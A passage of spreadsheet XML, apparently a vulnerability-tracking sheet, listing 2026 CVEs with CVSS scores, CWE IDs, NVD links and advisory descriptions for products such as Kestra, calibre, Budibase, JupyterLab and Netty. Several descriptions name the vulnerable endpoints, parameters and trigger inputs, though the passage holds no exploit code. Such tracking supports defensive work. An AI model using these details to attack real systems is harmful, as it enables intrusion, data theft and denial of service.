      <c r="K2773" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-306</t>
        </is>
      </c>
      <c r="L2773" s="5" t="inlineStr">
        <is>
          <t>Kestra is an open-source, event-driven orchestration platform. Prior to 2.0.0-rc6, Kestra's worker/src/main/java/io/kestra/worker/endpoint/WorkerEndpoint.java serves GET /worker without authentication and serializes the complete live Task object, which can expose commands, environment variables, HTTP headers, connection details, plaintext credentials, and execution identifiers while the main API on port 8080 remains protected. This issue is fixed in 2.0.0-rc6.</t>
        </is>
      </c>
      <c r="M2773" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73246</t>
        </is>
      </c>
    </row>
    <row r="2774">
      <c r="A2774" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2774" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73249</t>
        </is>
      </c>
      <c r="C2774" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2774" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2774" s="5" t="inlineStr"/>
      <c r="F2774" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2774" s="5" t="inlineStr"/>
      <c r="H2774" s="5" t="inlineStr"/>
      <c r="I2774" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2774" s="5" t="inlineStr"/>
      <c r="K2774" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2774" s="5" t="inlineStr">
        <is>
          <t>calibre is an e-book manager. Prior to 9.12.0, the calibre Content Server endpoint POST /book-update-annotations/{library_id}/{book_id}/{fmt} in src/calibre/srv/books.py omits needs_db_write=True, causing Router.dispatch() to skip ctx.check_for_write_access() before update_annotations() passes attacker-controlled JSON to db.merge_annotations_for_book(), which allows a readonly user or an anonymous user on an unauthenticated deployment to persist unauthorized book annotation changes. This issue is fixed in version 9.12.0.</t>
        </is>
      </c>
      <c r="M2774" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73249</t>
        </is>
      </c>
    </row>
    <row r="2775">
      <c r="A2775" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2775" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73285</t>
        </is>
      </c>
      <c r="C2775" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2775" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2775" s="5" t="inlineStr"/>
      <c r="F2775" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2775" s="5" t="inlineStr"/>
      <c r="H2775" s="5" t="inlineStr"/>
      <c r="I2775" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J2775" s="5" t="inlineStr"/>
      <c r="K2775" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L2775" s="5" t="inlineStr">
        <is>
          <t>RustFS is a distributed object storage system built in Rust. From 1.0.0-alpha.64 until 1.0.0-rc.1, RustFS external OPA authorization enabled by RUSTFS_POLICY_PLUGIN_URL in crates/iam/src/sys.rs sets PreparedIamAuth.needs_existing_object_tag incorrectly for PreparedIamMode::Opa, causing maybe_merge_object_tag_conditions to omit s3:ExistingObjectTag/* values and allowing authenticated users to bypass tag-based policy restrictions. This issue is fixed in version 1.0.0-rc.1.</t>
        </is>
      </c>
      <c r="M2775" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73285</t>
        </is>
      </c>
    </row>
    <row r="2776">
      <c r="A2776" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2776" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73406</t>
        </is>
      </c>
      <c r="C2776" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2776" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2776" s="5" t="inlineStr"/>
      <c r="F2776" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2776" s="5" t="inlineStr"/>
      <c r="H2776" s="5" t="inlineStr"/>
      <c r="I2776" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J2776" s="5" t="inlineStr"/>
      <c r="K2776" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L2776" s="5" t="inlineStr">
        <is>
          <t>Budibase is an open-source low-code platform. Prior to 3.39.32, GET /api/global/users/tenant/:id was listed in PUBLIC_ENDPOINTS in packages/worker/src/api/index.ts, and tenantUserLookup returned a full PlatformUser document. An unauthenticated caller could query an email or user identifier, distinguish existing users from missing users, and obtain tenant identifiers, user identifiers, email addresses, SSO identifiers, and document revision metadata. This issue is fixed in version 3.39.32.</t>
        </is>
      </c>
      <c r="M2776" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73406</t>
        </is>
      </c>
    </row>
    <row r="2777">
      <c r="A2777" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2777" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73415</t>
        </is>
      </c>
      <c r="C2777" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2777" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2777" s="5" t="inlineStr"/>
      <c r="F2777" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2777" s="5" t="inlineStr"/>
      <c r="H2777" s="5" t="inlineStr"/>
      <c r="I2777" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J2777" s="5" t="inlineStr"/>
      <c r="K2777" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2777" s="5" t="inlineStr">
        <is>
          <t>jupyterlab is an extensible environment for interactive and reproducible computing, based on the Jupyter Notebook Architecture. Prior to 4.5.10 and 4.6.2, in packages/imageviewer/src/widget.ts, JupyterLab's ImageViewer uses URL.createObjectURL for a specially crafted SVG image and revokes the blob URL too early, allowing the image to retain an executable same-origin context when it is opened through the image viewer and then opened in a new browser tab. The resulting cross-site scripting can be used to execute arbitrary code on the JupyterLab server. This issue is fixed in versions 4.5.10 and 4.6.2.</t>
        </is>
      </c>
      <c r="M2777" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73415</t>
        </is>
      </c>
    </row>
    <row r="2778">
      <c r="A2778" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2778" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73418</t>
        </is>
      </c>
      <c r="C2778" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2778" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2778" s="5" t="inlineStr"/>
      <c r="F2778" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2778" s="5" t="inlineStr"/>
      <c r="H2778" s="5" t="inlineStr"/>
      <c r="I2778" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J2778" s="5" t="inlineStr"/>
      <c r="K2778" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-248</t>
        </is>
      </c>
      <c r="L2778" s="5" t="inlineStr">
        <is>
          <t>NextAuth.js provides authentication for Next.js. Prior to @auth/core 0.41.3 and next-auth 4.24.15 and 5.0.0-beta.32, the exported getToken() helper in the next-auth/jwt and @auth/core/jwt modules can throw an uncaught exception when it reads a malformed Authorization: Bearer header. When no session cookie is present, getToken() URL-decodes the bearer value before validating it, and malformed percent encoding causes decodeURIComponent() to throw instead of treating the token as invalid. Because getToken() is commonly called in API routes, middleware, and server-side request handlers, a single unauthenticated request can trigger an unhandled exception in code paths that authenticate requests, causing a per-request denial of service without exposing tokens, sessions, or other data and without bypassing authentication. This issue is fixed in @auth/core 0.41.3 and next-auth 4.24.15 and 5.0.0-beta.32.</t>
        </is>
      </c>
      <c r="M2778" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73418</t>
        </is>
      </c>
    </row>
    <row r="2779">
      <c r="A2779" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2779" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73493</t>
        </is>
      </c>
      <c r="C2779" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2779" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2779" s="5" t="inlineStr"/>
      <c r="F2779" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2779" s="5" t="inlineStr"/>
      <c r="H2779" s="5" t="inlineStr"/>
      <c r="I2779" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J2779" s="5" t="inlineStr"/>
      <c r="K2779" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L2779" s="5" t="inlineStr">
        <is>
          <t>Http4s (http4s-blaze-server) is a minimal, idiomatic Scala interface for HTTP services. Prior to 0.23.18 and 1.0.0-M42, http4s-blaze-server aggregates fragments of an incoming WebSocket message with no limit on total size or fragment count. A client that completes a WebSocket handshake can send an unterminated fragmented message and drive unbounded heap growth in the server JVM, resulting in denial of service through OutOfMemoryError. Any http4s application serving WebSocket routes over BlazeServerBuilder is affected, no non-default configuration is required, and maxWebSocketBufferSize does not bound the aggregate because it bounds only individual frames. A single connection sending continuation frames that never set FIN forces the server to buffer every fragment until the heap is exhausted, terminating the JVM with OutOfMemoryError on the blaze selector thread. Small fragments amplify the cost through per-frame object overhead, so a modest volume of wire bytes is sufficient. This issue is fixed in versions 0.23.18 and 1.0.0-M42.</t>
        </is>
      </c>
      <c r="M2779" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73493</t>
        </is>
      </c>
    </row>
    <row r="2780">
      <c r="A2780" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2780" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73507</t>
        </is>
      </c>
      <c r="C2780" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2780" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2780" s="5" t="inlineStr"/>
      <c r="F2780" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2780" s="5" t="inlineStr">
        <is>
          <t>.net</t>
        </is>
      </c>
      <c r="H2780" s="5" t="inlineStr"/>
      <c r="I2780" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J2780" s="5" t="inlineStr"/>
      <c r="K2780" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2780" s="5" t="inlineStr">
        <is>
          <t>Netty is an asynchronous, event-driven network application framework. Prior to 4.1.136.Final and 4.2.16.Final, io.netty.handler.codec.xml.XmlFrameDecoder.decode() failed to preserve closing-tag parser state across invocations, so an unauthenticated remote attacker could trickle-feed repeated &lt;/ sequences that repeatedly rescanned the accumulated buffer and exhausted an EventLoop thread's CPU, causing denial of service with a maxFrameLength of 1 MB. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.</t>
        </is>
      </c>
      <c r="M2780" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73507</t>
        </is>
      </c>
    </row>
    <row r="2781">
      <c r="A2781" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2781" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73561</t>
        </is>
      </c>
      <c r="C2781" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2781" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2781" s="5" t="inlineStr"/>
      <c r="F2781" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2781" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2781" s="5" t="inlineStr"/>
      <c r="I2781" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J2781" s="5" t="inlineStr"/>
      <c r="K2781" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2781" s="5" t="inlineStr">
        <is>
          <t>Hub is a Node.js WebSocket server and client with added features. Prior to 0.2.16, every incoming unauthenticated WebSocket connection triggers loadDefaultConnectionEventListeners to call requestClientId, which calls rpc.send for the get-client-id action and pushes a request into RPC.requests. The RPC.waitForReply function starts a setInterval polling loop every 10 milliseconds that is cleared only after a matching reply; if the client remains silent and closes, the timer and pending request stay allocated because the socket close path does not cancel them. Repeated connections therefore cause unbounded timers and heap entries, exhausting CPU and memory and making the server unavailable. This issue is fixed in version 0.2.16.</t>
        </is>
      </c>
      <c r="M2781" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73561</t>
        </is>
      </c>
    </row>
    <row r="2782">
      <c r="A2782" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2782" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73785</t>
        </is>
      </c>
      <c r="C2782" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2782" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2782" s="5" t="inlineStr"/>
      <c r="F2782" s="5" t="inlineStr"/>
      <c r="G2782" s="5" t="inlineStr"/>
      <c r="H2782" s="5" t="inlineStr"/>
      <c r="I2782" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J2782" s="5" t="inlineStr"/>
      <c r="K2782" s="5" t="inlineStr">
        <is>
          <t>CWE-241</t>
        </is>
      </c>
      <c r="L2782" s="5" t="inlineStr">
        <is>
          <t>A potential security vulnerability in HPE IceWall Federation Agent and Proxy could allow a remote unauthenticated attacker to cause a denial of service (DoS).</t>
        </is>
      </c>
      <c r="M2782" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73785</t>
        </is>
      </c>
    </row>
    <row r="2783">
      <c r="A2783" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2783" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73786</t>
        </is>
      </c>
      <c r="C2783" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2783" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2783" s="5" t="inlineStr"/>
      <c r="F2783" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2783" s="5" t="inlineStr"/>
      <c r="H2783" s="5" t="inlineStr"/>
      <c r="I2783" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2783" s="5" t="inlineStr"/>
      <c r="K2783" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2783" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the web-based management interface of CPPM could allow an unauthenticated remote attacker to conduct a Denial-of-Service (DoS) attack. Successful exploitation could allow an attacker to cause instability and degrade performance of the vulnerable CPPM server.</t>
        </is>
      </c>
      <c r="M2783" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73786</t>
        </is>
      </c>
    </row>
    <row r="2784">
      <c r="A2784" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2784" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74761</t>
        </is>
      </c>
      <c r="C2784" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2784" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2784" s="5" t="inlineStr"/>
      <c r="F2784" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2784" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H2784" s="5" t="inlineStr"/>
      <c r="I2784" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2784" s="5" t="inlineStr"/>
      <c r="K2784" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L2784" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in TopicRegion in Apache ActiveMQ, Apache ActiveMQ Broker, and Apache ActiveMQ All on all platforms.
An authenticated client can spoof clientId when removing a durable topic subscription.
This issue affects Apache ActiveMQ Broker: before 5.19.11, from 6.0.0 before 6.3.2; Apache ActiveMQ All: before 5.19.11, from 6.0.0 before 6.3.2; Apache ActiveMQ: before 5.19.11, from 6.0.0 before 6.3.2.
Users are recommended to upgrade to version 6.3.2 or 5.19.11 which fixes the issue.</t>
        </is>
      </c>
      <c r="M2784" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74761</t>
        </is>
      </c>
    </row>
    <row r="2785">
      <c r="A2785" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2785" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75328</t>
        </is>
      </c>
      <c r="C2785" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2785" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2785" s="5" t="inlineStr"/>
      <c r="F2785" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2785" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2785" s="5" t="inlineStr"/>
      <c r="I2785" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J2785" s="5" t="inlineStr"/>
      <c r="K2785" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2785" s="5" t="inlineStr">
        <is>
          <t>In DocSys-master V2.02.85, the downloadDocEx interface in src/com/DocSystem/controller/DocController.java has an arbitrary file read vulnerability:</t>
        </is>
      </c>
      <c r="M2785" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75328</t>
        </is>
      </c>
    </row>
    <row r="2786">
      <c r="A2786" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2786" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75368</t>
        </is>
      </c>
      <c r="C2786" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2786" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2786" s="5" t="inlineStr"/>
      <c r="F2786" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2786" s="5" t="inlineStr"/>
      <c r="H2786" s="5" t="inlineStr"/>
      <c r="I2786" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J2786" s="5" t="inlineStr"/>
      <c r="K2786" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L2786" s="5" t="inlineStr">
        <is>
          <t>A stack overflow in the loadRawData function of SpaceDot AcubeSAT OBC software commit eaf90ec allows attackers to cause a Denial of Service (DoS) via supplying a crafted ECSS TC message.</t>
        </is>
      </c>
      <c r="M2786" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75368</t>
        </is>
      </c>
    </row>
    <row r="2787">
      <c r="A2787" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2787" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75371</t>
        </is>
      </c>
      <c r="C2787" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2787" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2787" s="5" t="inlineStr"/>
      <c r="F2787" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2787" s="5" t="inlineStr"/>
      <c r="H2787" s="5" t="inlineStr"/>
      <c r="I2787" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J2787" s="5" t="inlineStr"/>
      <c r="K2787" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2787" s="5" t="inlineStr">
        <is>
          <t>An integer handling flaw in the cobs_decode function of SpaceDot AcubeSAT OBC software commit eaf90ec allows physically-proximate attackers with UART access to cause a Denial of Service (DoS) via a crafted input.</t>
        </is>
      </c>
      <c r="M2787" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75371</t>
        </is>
      </c>
    </row>
    <row r="2788">
      <c r="A2788" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2788" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75413</t>
        </is>
      </c>
      <c r="C2788" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2788" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2788" s="5" t="inlineStr"/>
      <c r="F2788" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2788" s="5" t="inlineStr"/>
      <c r="H2788" s="5" t="inlineStr"/>
      <c r="I2788" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J2788" s="5" t="inlineStr"/>
      <c r="K2788" s="5" t="inlineStr">
        <is>
          <t>CWE-552</t>
        </is>
      </c>
      <c r="L2788" s="5" t="inlineStr">
        <is>
          <t>DocSys V2.02.80 is vulnerable to Any File Download. An attacker does not need to go through authentication to utilize the downloadDocEx.do interface and download any file via the parameter targetPath.</t>
        </is>
      </c>
      <c r="M2788" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75413</t>
        </is>
      </c>
    </row>
    <row r="2789">
      <c r="A2789" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2789" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75438</t>
        </is>
      </c>
      <c r="C2789" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2789" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2789" s="5" t="inlineStr"/>
      <c r="F2789" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2789" s="5" t="inlineStr"/>
      <c r="H2789" s="5" t="inlineStr"/>
      <c r="I2789" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2789" s="5" t="inlineStr"/>
      <c r="K2789" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="L2789" s="5" t="inlineStr">
        <is>
          <t>Buffer Overflow vulnerability in Open5GS v2.7.7 allows a remote attacker to cause a denial of service via the ogs_sbi_time_parse() function</t>
        </is>
      </c>
      <c r="M2789" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75438</t>
        </is>
      </c>
    </row>
    <row r="2790">
      <c r="A2790" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2790" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75465</t>
        </is>
      </c>
      <c r="C2790" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2790" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2790" s="5" t="inlineStr"/>
      <c r="F2790" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2790" s="5" t="inlineStr"/>
      <c r="H2790" s="5" t="inlineStr"/>
      <c r="I2790" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J2790" s="5" t="inlineStr"/>
      <c r="K2790" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L2790" s="5" t="inlineStr">
        <is>
          <t>The /api.php/user/get_list endpoint in Maccms v10 v2026.1000.4055 is vulnerable to an Incorrect Access Control issue. The interface fails to perform any authentication or authorization checks. An unauthenticated remote attacker can send a crafted HTTP GET request with limit and offset parameters to paginate and retrieve sensitive information of all registered users.</t>
        </is>
      </c>
      <c r="M2790" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75465</t>
        </is>
      </c>
    </row>
    <row r="2791">
      <c r="A2791" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2791" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75501</t>
        </is>
      </c>
      <c r="C2791" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2791" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2791" s="5" t="inlineStr"/>
      <c r="F2791" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2791" s="5" t="inlineStr"/>
      <c r="H2791" s="5" t="inlineStr"/>
      <c r="I2791" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J2791" s="5" t="inlineStr"/>
      <c r="K2791" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L2791" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the Calix EXOS firmware for the GS7 XGS (GS5239XG) residential router allows unauthenticated remote attackers to modify NAT port‑forwarding rules via the UPnP WANIPConnection service. The device exposes the MiniUPnPd control endpoint on the WAN interface on TCP port 5000 without access controls. A remote attacker can send crafted SOAP requests to add, delete, or enumerate port mappings, or to query the external IP address, without authentication. Successful exploitation may enable bypass of the firewall/NAT boundary and exposure of internal LAN services to the public internet.</t>
        </is>
      </c>
      <c r="M2791" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75501</t>
        </is>
      </c>
    </row>
    <row r="2792">
      <c r="A2792" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2792" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75998</t>
        </is>
      </c>
      <c r="C2792" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2792" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2792" s="5" t="inlineStr"/>
      <c r="F2792" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2792" s="5" t="inlineStr"/>
      <c r="H2792" s="5" t="inlineStr"/>
      <c r="I2792" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2792" s="5" t="inlineStr"/>
      <c r="K2792" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L2792" s="5" t="inlineStr">
        <is>
          <t>ColdFusion is affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could exploit this vulnerability to access sensitive files and directories outside the intended access scope. Exploitation of this issue does not require user interaction.</t>
        </is>
      </c>
      <c r="M2792" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75998</t>
        </is>
      </c>
    </row>
    <row r="2793">
      <c r="A2793" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2793" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76098</t>
        </is>
      </c>
      <c r="C2793" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2793" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2793" s="5" t="inlineStr"/>
      <c r="F2793" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2793" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2793" s="5" t="inlineStr"/>
      <c r="I2793" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J2793" s="5" t="inlineStr"/>
      <c r="K2793" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="L2793" s="5" t="inlineStr">
        <is>
          <t>Mistune is a Python Markdown parser with renderers and plugins. Versions 3.3.0 through 3.3.2 are vulnerable to DoS through deeply nested tokens. HTML rendering creates deeply nested emphasis tokens from consecutive asterisk characters, and recursive rendering in HTMLRenderer.render_token() can exceed Python's recursion limit and raise RecursionError, allowing crafted Markdown to crash a parsing process. This issue is fixed in version 3.3.3</t>
        </is>
      </c>
      <c r="M2793" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76098</t>
        </is>
      </c>
    </row>
    <row r="2794">
      <c r="A2794" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2794" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76169</t>
        </is>
      </c>
      <c r="C2794" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2794" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
